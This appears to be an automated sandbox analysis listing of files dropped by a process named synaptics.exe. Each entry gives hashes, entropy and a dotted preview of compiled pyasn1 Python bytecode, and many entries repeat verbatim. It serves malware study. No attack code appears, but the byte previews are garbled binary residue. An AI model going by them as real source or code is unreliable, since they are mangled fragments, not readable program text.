                                                                                                                                                                                                            Preview:o.......p..g.........................@...sb...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e.j...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......N)...error)...univc....................@...sd...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.e.j.f.d.d...Z.d.d.d...Z.e.d.d.....Z.e.j.d.d.....Z.d.d...Z.d.S.)...CachingStreamWrappera....Wrapper around non-seekable streams... Note that the implementation is tied to the decoder,. not checking for dangerous arguments for the sake. of performance... The read bytes are kept in an internal cache until. setting _markedPosition which may reset the cache.. c....................C...s....|.|._.t.....|._.d.|._.d.S...Nr....)..._raw..io..BytesIO.._cache.._markedPosition)...self..raw..r.....SC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\streaming.py..__init__....s..........z.CachingStreamWrapper.__init__c....................C...s$...|...|...}.|.j...t.|.....t.j.....|.S...N)...readr......seek..len..os..SEEK_CUR).r......n
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5836
                                                                                                                                                                                                            Entropy (8bit):5.282456829331137
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:W+ZlQBEsXLK7LEQ8yjdQBblCEdS1azu5VZ6qMwxqNo+dTqVSM5LleeVOpRfYyU6W:3LrZ+jCr1azunZNMLoeTsH5LlL6RfYTv
                                                                                                                                                                                                            MD5:5AD5B3DD76C44AFD7A55B669A5E09056
                                                                                                                                                                                                            SHA1:FE086D34A157CD3097A153E567860F6BD4822FE0
                                                                                                                                                                                                            SHA-256:B9C144EF0AA4714FB8A8222CFF8405B2CA8226E3344BCD445B49E2C321D013BD
                                                                                                                                                                                                            SHA-512:5AD1E004173F8263C74C724276072ECD0670067F240468587EF0713FE5730C8FC10076C645BD7E94120E132446DF02BA6C6E6153C79013FF25D362F4140524FA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...sb...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e.j...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.)......N)...error)...univc....................@...sd...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.e.j.f.d.d...Z.d.d.d...Z.e.d.d.....Z.e.j.d.d.....Z.d.d...Z.d.S.)...CachingStreamWrappera....Wrapper around non-seekable streams... Note that the implementation is tied to the decoder,. not checking for dangerous arguments for the sake. of performance... The read bytes are kept in an internal cache until. setting _markedPosition which may reset the cache.. c....................C...s....|.|._.t.....|._.d.|._.d.S...Nr....)..._raw..io..BytesIO.._cache.._markedPosition)...self..raw..r.....SC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\streaming.py..__init__....s..........z.CachingStreamWrapper.__init__c....................C...s$...|...|...}.|.j...t.|.....t.j.....|.S...N)...readr......seek..len..os..SEEK_CUR).r......n
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                            Entropy (8bit):4.673691793083781
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWezouWAut+kiE2J5dj/a6iVWrzL19AXkcTgp:y/3KCqeh/w/o+uwkn23h/a/Ardm4
                                                                                                                                                                                                            MD5:480019FA44DF5AB973B639B7D3077F64
                                                                                                                                                                                                            SHA1:24741D0F2454DE7C6C22CCDD76313C9871C115CE
                                                                                                                                                                                                            SHA-256:08781A221DCF30B9B3ABAF63F371648F6E42C038D42CA0637032CE3BE77C40D9
                                                                                                                                                                                                            SHA-512:FF813F1FEF689618090E09287C04C5752CC335CF981C7BE3861946D4D503E09EFDAA54F9F0B2E17C92D8B5DB5F57F065DAF752F48B6B0FB8E278647680C34F32
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\ber\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):42177
                                                                                                                                                                                                            Entropy (8bit):5.649154829662972
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:WWm8A/SzSYCTAE7rMi7Oj7KRXjT0DZESJDv/yY7cwel7+gkVy0/lpPUno7wwzY:WWbAqzSSEciqj7KRXjs7f+7MpKt
                                                                                                                                                                                                            MD5:2D6B2A6B22BCD613B5205E71DE646C4A
                                                                                                                                                                                                            SHA1:74509504B8FEDA197147FA12DA73C0DEF1EC7FB4
                                                                                                                                                                                                            SHA-256:FEBA1535D81308CA290FB42322C563759D14645D9BA8796EA7A473916F158BB6
                                                                                                                                                                                                            SHA-512:372C0C84D4191F5B3FEE49C0BCAF869A7FD82EB742EAA4BAE8E18838256D3253495A52DB0F3E554B1789B7965E9B05598B09DCE0311519AE37B3EDED8E10EFAF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..gX5.......................@...sT...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z.e.j.e.e.j.d...Z.e.j.Z.e.j.Z.G.d.d...d.e ..Z!G.d.d...d.e!..Z"G.d.d...d.e"..Z#e#..Z$G.d.d...d.e"..Z%G.d.d...d.e%..Z&G.d.d...d.e"..Z'G.d.d ..d e"..Z(G.d!d"..d"e"..Z)G.d#d$..d$e"..Z*G.d%d&..d&e"..Z+G.d'd(..d(e"..Z,G.d)d*..d*e!..Z-G.d+d,..d,e-..Z.G.d-d...d.e...Z/G.d/d0..d0e/..Z0G.d1d2..d2e/..Z1G.d3d4..d4e...Z2G.d5d6..d6e2..Z3G.d7d8..d8e2..Z4G.d9d:..d:e...Z5G.d;d<..d<e"..Z6G.d=d>..d>e(..Z7G.d?d@..d@e(..Z8G.dAdB..dBe(..Z9G.dCdD..dDe(..Z:G.dEdF..dFe(..Z;G.dGdH..dHe(..Z<G.dIdJ..dJe(..Z=G.dKdL..dLe(..Z>G.dMdN..dNe(..Z?G.dOdP..dPe(..Z@G.dQdR..dRe(..ZAG.dSdT..dTe(..ZBG.dUdV..dVe(..ZCG.dWdX..dXe(..ZDi.e.jEjFe%....e.jGjFe&....e.jHjFe'....e.jIjFe(....e.jJjFe)....e.jKjFe*....e.jLjFe+....e.jMjFe%....e.jNjFe,....e.jOjFe/....e.jPjFe2....e.jQjF
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):790
                                                                                                                                                                                                            Entropy (8bit):5.122277133230522
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:PnsMN0EngkvZJW64GBSfPszRD3QWqSoFB6GU:fsinVQ6iMoPw
                                                                                                                                                                                                            MD5:BF6EBF02C0BD2BFBDBDF48D249C2BC50
                                                                                                                                                                                                            SHA1:259F6D87706B11A4C9098D2B97B98E911EC3FD6C
                                                                                                                                                                                                            SHA-256:D3738C000AA426E366B2B627E05367A1C44D5FA2BA2727DFB0C8E3CD3CC1BEFA
                                                                                                                                                                                                            SHA-512:F3AFD9807F531695E6BEFC3BF3D75F78679A7F66D3A74AE30CD0BE57267543904908F8F40ED2E6ED63BE8A69870AA0998ED4BF25B1BE121130374704D047EDAB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s:...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.G.d.d...d.e.j...Z.e...Z.d.S.)......)...base)...tag..endOfOctetsc....................@...s4...e.Z.d.Z.d.Z.e...e...e.j.e.j.d.....Z.d.Z.d.d...Z.d.S.)...EndOfOctetsr....Nc....................O...s*...|.j.d.u.r.t.j.|.g.|...R.i.|.....|._.|.j.S.).N)..._instance..object..__new__)...cls..args..kwargs..r.....QC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\ber\eoo.pyr........s..........z.EndOfOctets.__new__)...__name__..__module__..__qualname__Z.defaultValuer......initTagSet..Tag..tagClassUniversal..tagFormatSimple..tagSetr....r....r....r....r....r....r........s..................r....N)...pyasn1.typer....r......__all__..SimpleAsn1Typer....r....r....r....r....r......<module>....s..............
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                            Entropy (8bit):4.664699388198659
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWezouWAut+kiE2J5dj/a6iVWrzL18ygOkcTgp:y/3KCqeh/w/o+uwkn23h/a/Ard8Nu4
                                                                                                                                                                                                            MD5:C5928700354F759AD52E868D732C134A
                                                                                                                                                                                                            SHA1:ECEEB5CCF3F1AA4D1FDDEE2275E0F7C58820790A
                                                                                                                                                                                                            SHA-256:335E36FD4E2BA6B673A493638A652144043805D7D78E5B918A969C34A5DD9421
                                                                                                                                                                                                            SHA-512:BDFF81F95705A81A3EA8347D1835496E3A5FEF319C399593781DEA6E38A4CED14F9F229D049C193378472661DFEE78959F8BFB0FBCCA2B6C010CA676EE7BA74C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\cer\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                            Entropy (8bit):4.664699388198659
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWezouWAut+kiE2J5dj/a6iVWrzL18ygOkcTgp:y/3KCqeh/w/o+uwkn23h/a/Ard8Nu4
                                                                                                                                                                                                            MD5:C5928700354F759AD52E868D732C134A
                                                                                                                                                                                                            SHA1:ECEEB5CCF3F1AA4D1FDDEE2275E0F7C58820790A
                                                                                                                                                                                                            SHA-256:335E36FD4E2BA6B673A493638A652144043805D7D78E5B918A969C34A5DD9421
                                                                                                                                                                                                            SHA-512:BDFF81F95705A81A3EA8347D1835496E3A5FEF319C399593781DEA6E38A4CED14F9F229D049C193378472661DFEE78959F8BFB0FBCCA2B6C010CA676EE7BA74C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\cer\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                            Entropy (8bit):4.664699388198659
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWezouWAut+kiE2J5dj/a6iVWrzL18ygOkcTgp:y/3KCqeh/w/o+uwkn23h/a/Ard8Nu4
                                                                                                                                                                                                            MD5:C5928700354F759AD52E868D732C134A
                                                                                                                                                                                                            SHA1:ECEEB5CCF3F1AA4D1FDDEE2275E0F7C58820790A
                                                                                                                                                                                                            SHA-256:335E36FD4E2BA6B673A493638A652144043805D7D78E5B918A969C34A5DD9421
                                                                                                                                                                                                            SHA-512:BDFF81F95705A81A3EA8347D1835496E3A5FEF319C399593781DEA6E38A4CED14F9F229D049C193378472661DFEE78959F8BFB0FBCCA2B6C010CA676EE7BA74C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\cer\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2510
                                                                                                                                                                                                            Entropy (8bit):5.399967254791454
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:fz8iXwFKzH/u19DflQ6ePi8clOVaJORi6Zy0punszpDVYRB:fz5XTfcfggEaJONNpunszp5K
                                                                                                                                                                                                            MD5:D46B94A5E6C242C9F884CD9AB89789C5
                                                                                                                                                                                                            SHA1:09DD917766CE99A9D0DF70A3E5674E24E4D29B49
                                                                                                                                                                                                            SHA-256:8622D265F628F1934E5CD9D3AE374483BECAA89A3EEA07AB51419E224007E435
                                                                                                                                                                                                            SHA-512:AEDBF0311E90A17D194E45F6C7431CD9E306C3FB437AB208E1A84BAFD93405C9198DCA0C1F4FD081304C96761993EFD06C8A74484AB01F894C994E09556234BD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s8...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.e.j.Z.G.d.d...d.e.j...Z.e.j.Z.e.j.Z.e.j.Z.e.j.....Z.e...e.j.j.e...e.j.j.e...e.j.j.e...e.j.j.e...i.....e.j.....Z.e.....D.].Z.e.j.d.u.rte.j.j.j.Z.e.d.u.rte.e.v.rte.e.e.<.q\G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j ..Z e ..Z!d.e"f.d.d...Z#d.S.)......N)...error)...readFromStream)...decoder)...univ..decode..StreamingDecoderc....................@...s$...e.Z.d.Z.e...d...Z.....d.d.d...Z.d.S.)...BooleanPayloadDecoderr....Nc....................k...s......|.d.k.r.t...d.....t.|.|.|...D.].}.t.|.t...r.|.V...q.|.d...}.|.d.k.r&d.}.n.|.d.k.r-d.}.n.t...d.|.......|.j.|.|.|.f.i.|.....V...d.S.).N.....z Not single-octet Boolean payloadr.........z.Unexpected Boolean payload: %s).r....Z.PyAsn1Errorr......isinstance..SubstrateUnderrunErrorZ._createComponent)...selfZ.substrateZ.asn1Spec..tagSet..length..stateZ.decodeFunZ.substrateFun..options..chunk..byte..value..r.....UC:\Users\user\AppData\Lo
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2510
                                                                                                                                                                                                            Entropy (8bit):5.399967254791454
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:fz8iXwFKzH/u19DflQ6ePi8clOVaJORi6Zy0punszpDVYRB:fz5XTfcfggEaJONNpunszp5K
                                                                                                                                                                                                            MD5:D46B94A5E6C242C9F884CD9AB89789C5
                                                                                                                                                                                                            SHA1:09DD917766CE99A9D0DF70A3E5674E24E4D29B49
                                                                                                                                                                                                            SHA-256:8622D265F628F1934E5CD9D3AE374483BECAA89A3EEA07AB51419E224007E435
                                                                                                                                                                                                            SHA-512:AEDBF0311E90A17D194E45F6C7431CD9E306C3FB437AB208E1A84BAFD93405C9198DCA0C1F4FD081304C96761993EFD06C8A74484AB01F894C994E09556234BD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s8...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.e.j.Z.G.d.d...d.e.j...Z.e.j.Z.e.j.Z.e.j.Z.e.j.....Z.e...e.j.j.e...e.j.j.e...e.j.j.e...e.j.j.e...i.....e.j.....Z.e.....D.].Z.e.j.d.u.rte.j.j.j.Z.e.d.u.rte.e.v.rte.e.e.<.q\G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j ..Z e ..Z!d.e"f.d.d...Z#d.S.)......N)...error)...readFromStream)...decoder)...univ..decode..StreamingDecoderc....................@...s$...e.Z.d.Z.e...d...Z.....d.d.d...Z.d.S.)...BooleanPayloadDecoderr....Nc....................k...s......|.d.k.r.t...d.....t.|.|.|...D.].}.t.|.t...r.|.V...q.|.d...}.|.d.k.r&d.}.n.|.d.k.r-d.}.n.t...d.|.......|.j.|.|.|.f.i.|.....V...d.S.).N.....z Not single-octet Boolean payloadr.........z.Unexpected Boolean payload: %s).r....Z.PyAsn1Errorr......isinstance..SubstrateUnderrunErrorZ._createComponent)...selfZ.substrateZ.asn1Spec..tagSet..length..stateZ.decodeFunZ.substrateFun..options..chunk..byte..value..r.....UC:\Users\user\AppData\Lo
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2510
                                                                                                                                                                                                            Entropy (8bit):5.399967254791454
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:fz8iXwFKzH/u19DflQ6ePi8clOVaJORi6Zy0punszpDVYRB:fz5XTfcfggEaJONNpunszp5K
                                                                                                                                                                                                            MD5:D46B94A5E6C242C9F884CD9AB89789C5
                                                                                                                                                                                                            SHA1:09DD917766CE99A9D0DF70A3E5674E24E4D29B49
                                                                                                                                                                                                            SHA-256:8622D265F628F1934E5CD9D3AE374483BECAA89A3EEA07AB51419E224007E435
                                                                                                                                                                                                            SHA-512:AEDBF0311E90A17D194E45F6C7431CD9E306C3FB437AB208E1A84BAFD93405C9198DCA0C1F4FD081304C96761993EFD06C8A74484AB01F894C994E09556234BD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g.........................@...s8...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.e.j.Z.G.d.d...d.e.j...Z.e.j.Z.e.j.Z.e.j.Z.e.j.....Z.e...e.j.j.e...e.j.j.e...e.j.j.e...e.j.j.e...i.....e.j.....Z.e.....D.].Z.e.j.d.u.rte.j.j.j.Z.e.d.u.rte.e.v.rte.e.e.<.q\G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j ..Z e ..Z!d.e"f.d.d...Z#d.S.)......N)...error)...readFromStream)...decoder)...univ..decode..StreamingDecoderc....................@...s$...e.Z.d.Z.e...d...Z.....d.d.d...Z.d.S.)...BooleanPayloadDecoderr....Nc....................k...s......|.d.k.r.t...d.....t.|.|.|...D.].}.t.|.t...r.|.V...q.|.d...}.|.d.k.r&d.}.n.|.d.k.r-d.}.n.t...d.|.......|.j.|.|.|.f.i.|.....V...d.S.).N.....z Not single-octet Boolean payloadr.........z.Unexpected Boolean payload: %s).r....Z.PyAsn1Errorr......isinstance..SubstrateUnderrunErrorZ._createComponent)...selfZ.substrateZ.asn1Spec..tagSet..length..stateZ.decodeFunZ.substrateFun..options..chunk..byte..value..r.....UC:\Users\user\AppData\Lo
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                            Entropy (8bit):4.666735857341677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWezouWAut+kiE2J5dj/a6iVWrzL17BOkcTgp:y/3KCqeh/w/o+uwkn23h/a/Ard04
                                                                                                                                                                                                            MD5:AD46CB0EF838B65032FF9A4BA577267E
                                                                                                                                                                                                            SHA1:D94096451D0A8B6675B0F3562F889556DA2584A0
                                                                                                                                                                                                            SHA-256:D022786AB0F3DEABB48146FE7C45D800173C6B64DDF012E3B6010792F3D54672
                                                                                                                                                                                                            SHA-512:5758396A3B4D1FCC307D175142C7AD31A9571294D4FB9F4B801EC803498D30082FF295E22005CC7A1F290A008233953234B170BA38A4C16A6D923E9B3319B24D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\der\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                            Entropy (8bit):4.666735857341677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWezouWAut+kiE2J5dj/a6iVWrzL17BOkcTgp:y/3KCqeh/w/o+uwkn23h/a/Ard04
                                                                                                                                                                                                            MD5:AD46CB0EF838B65032FF9A4BA577267E
                                                                                                                                                                                                            SHA1:D94096451D0A8B6675B0F3562F889556DA2584A0
                                                                                                                                                                                                            SHA-256:D022786AB0F3DEABB48146FE7C45D800173C6B64DDF012E3B6010792F3D54672
                                                                                                                                                                                                            SHA-512:5758396A3B4D1FCC307D175142C7AD31A9571294D4FB9F4B801EC803498D30082FF295E22005CC7A1F290A008233953234B170BA38A4C16A6D923E9B3319B24D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\der\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                            Entropy (8bit):4.666735857341677
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/PvKGtuleh/wZWezouWAut+kiE2J5dj/a6iVWrzL17BOkcTgp:y/3KCqeh/w/o+uwkn23h/a/Ard04
                                                                                                                                                                                                            MD5:AD46CB0EF838B65032FF9A4BA577267E
                                                                                                                                                                                                            SHA1:D94096451D0A8B6675B0F3562F889556DA2584A0
                                                                                                                                                                                                            SHA-256:D022786AB0F3DEABB48146FE7C45D800173C6B64DDF012E3B6010792F3D54672
                                                                                                                                                                                                            SHA-512:5758396A3B4D1FCC307D175142C7AD31A9571294D4FB9F4B801EC803498D30082FF295E22005CC7A1F290A008233953234B170BA38A4C16A6D923E9B3319B24D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..g;........................@...s....d.S.).N..r....r....r.....VC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\der\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1877
                                                                                                                                                                                                            Entropy (8bit):5.13163452253019
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:ljM1Beausa5bi6PPeJZsf2NLPKcDP4h8bM8rc6826aFQc6ZLCJckPyhvc4J4XQC1:6NkiuPEiAzHDwmPrS216ZOcBzAn1
                                                                                                                                                                                                            MD5:181B537788F91E1C1202C03D4C4BF63E
                                                                                                                                                                                                            SHA1:D70D4A8148F693705BDDCD2D3240275F62884279
                                                                                                                                                                                                            SHA-256:ABADFEA6E07931D6611C9024553D535C3960C0B2164611460F74E6586017AC81
                                                                                                                                                                                                            SHA-512:EEAB67CBD5892F4DBA8C2D68A3464CEAE1528F00856345B611D73318803AC89FE80ED4E78495F76AF85F673C88E6082EDE87B505F0768DFD76B0BA67359F1A6E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..gd........................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.Z.e.j.....Z.e...e.j.j.e...e.j.j.e...e.j.j.e...i.....e.j.....Z.e.....D.].Z.e.j.d.u.rce.j.j.j.Z.e.d.u.rce.e.v.rce.e.e.<.qKG.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e...Z.d.e.f.d.d...Z.d.S.)......N)...decoder)...univ..decode..StreamingDecoderc....................@........e.Z.d.Z.d.Z.d.S.)...BitStringPayloadDecoderFN....__name__..__module__..__qualname__Z.supportConstructedForm..r....r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\der\decoder.pyr.................r....c....................@...r....)...OctetStringPayloadDecoderFNr....r....r....r....r....r........r....r....c....................@...s ...e.Z.d.Z.e.j.j.Z.e.Z.e.Z.d.Z.d.S.)...SingleItemDecoderFN).r....r....r....r....r......__doc__..TAG_MAP..TYPE_MAPZ.supportIndefLengthr....r....r....r....r....+...s..............r....c....................@........e.Z.d.Z.e.j.j.Z.e.Z.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1877
                                                                                                                                                                                                            Entropy (8bit):5.13163452253019
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:ljM1Beausa5bi6PPeJZsf2NLPKcDP4h8bM8rc6826aFQc6ZLCJckPyhvc4J4XQC1:6NkiuPEiAzHDwmPrS216ZOcBzAn1
                                                                                                                                                                                                            MD5:181B537788F91E1C1202C03D4C4BF63E
                                                                                                                                                                                                            SHA1:D70D4A8148F693705BDDCD2D3240275F62884279
                                                                                                                                                                                                            SHA-256:ABADFEA6E07931D6611C9024553D535C3960C0B2164611460F74E6586017AC81
                                                                                                                                                                                                            SHA-512:EEAB67CBD5892F4DBA8C2D68A3464CEAE1528F00856345B611D73318803AC89FE80ED4E78495F76AF85F673C88E6082EDE87B505F0768DFD76B0BA67359F1A6E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......p..gd........................@...s....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.Z.e.j.....Z.e...e.j.j.e...e.j.j.e...e.j.j.e...i.....e.j.....Z.e.....D.].Z.e.j.d.u.rce.j.j.j.Z.e.d.u.rce.e.v.rce.e.e.<.qKG.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e...Z.d.e.f.d.d...Z.d.S.)......N)...decoder)...univ..decode..StreamingDecoderc....................@........e.Z.d.Z.d.Z.d.S.)...BitStringPayloadDecoderFN....__name__..__module__..__qualname__Z.supportConstructedForm..r....r.....UC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\pyasn1\codec\der\decoder.pyr.................r....c....................@...r....)...OctetStringPayloadDecoderFNr....r....r....r....r....r........r....r....c....................@...s ...e.Z.d.Z.e.j.j.Z.e.Z.e.Z.d.Z.d.S.)...SingleItemDecoderFN).r....r....r....r....r......__doc__..TAG_MAP..TYPE_MAPZ.supportIndefLengthr....r....r....r....r....+...s..............r....c....................@........e.Z.d.Z.e.j.j.Z.e.Z.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                                                            Entropy (8bit):4.926613856737506
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6:y/3Cqev/UlcrfllhZDwkn23h/a/ArdaDuR:C3Cqev/XNlh+fsraR
                                                                                                                                                                                                            MD5:D0770D7312996C190E4F3213622D28D5
                                                                                                                                                                                                            SHA1:5D452302D9E32AB7B38E07E4FFD33456035545AF
